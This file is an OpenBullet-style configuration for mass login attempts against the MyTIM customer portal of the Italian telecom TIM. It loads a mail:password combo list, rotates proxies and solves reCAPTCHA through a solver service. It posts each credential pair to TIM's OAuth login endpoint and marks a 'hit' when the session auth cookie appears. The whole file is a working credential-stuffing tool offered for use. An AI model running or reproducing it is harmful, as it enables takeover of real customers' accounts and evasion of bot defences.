[SETTINGS]
{
  "Name": "MYTIM WEB",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2022-03-14T17:34:43.5143493+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "mytim-web",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST GET "https://mytim.tim.it/login-authorize.html" 
  

PARSE "<SOURCE>" LR "client_id\" value=\"" "\"" -> VAR "client_id" 

REQUEST GET "https://api.tim.it/auth/oauth/v2/authorize?response_type=code&client_id=<client_id>&redirect_uri=https%3A%2F%2Fmytim.tim.it%2Flogin-token.html&scope=openid+oob&prompt=none+SSO&nonce=lxA_muSqOZlt&state=https%3A%2F%2Fmytim.tim.it%2F&code_challenge=20Q0J_I8WO0PS4r8Z3WcpuOBhzs_CUTFrgz0UbYg59E&code_challenge_method=S256" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#sd PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"sessionData\" value=\"" "\"/>" -> VAR "sd" 

#id PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"sessionID\" value=\"" "\"/>" -> VAR "id" 

SOLVECAPTCHA ReCaptchaV2 "6LccZNwZAAAAAEljEB7X6vNpkngqLX7XbrcJWqrK" "https://api.tim.it/" 

#1 FUNCTION URLEncode "<USER>" -> VAR "1" 

#2 FUNCTION URLEncode "<PASS>" -> VAR "2" 

REQUEST POST "https://api.tim.it/auth/oauth/v2/authorize/login" 
  CONTENT "sessionID=<id>&sessionData=<sd>&username=<1>&password=<2>&remember=true&g-recaptcha-response=<SOLUTION>&response_type=&response_mode=&action=login" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: api.tim.it" 
  HEADER "Origin: https://api.tim.it" 
  HEADER "Referer: https://api.tim.it/auth/oauth/v2/authorize/login" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-GPC: 1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Mobile Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "USERNAME_NOT_FOUND" 
    KEY "PASSWORD_WRONG_MYTIM" 
  KEYCHAIN Success AND 
    KEY "<SOURCE>" DoesNotContain "PASSWORD_WRONG_MYTIM" 
    KEY "<SOURCE>" DoesNotContain "USERNAME_NOT_FOUND" 
    KEY "<COOKIES{*}>" Contains "DCAUTH_AUTH_COOKIE" 

#author FUNCTION Constant "@uzzzul" -> CAP "configby" 

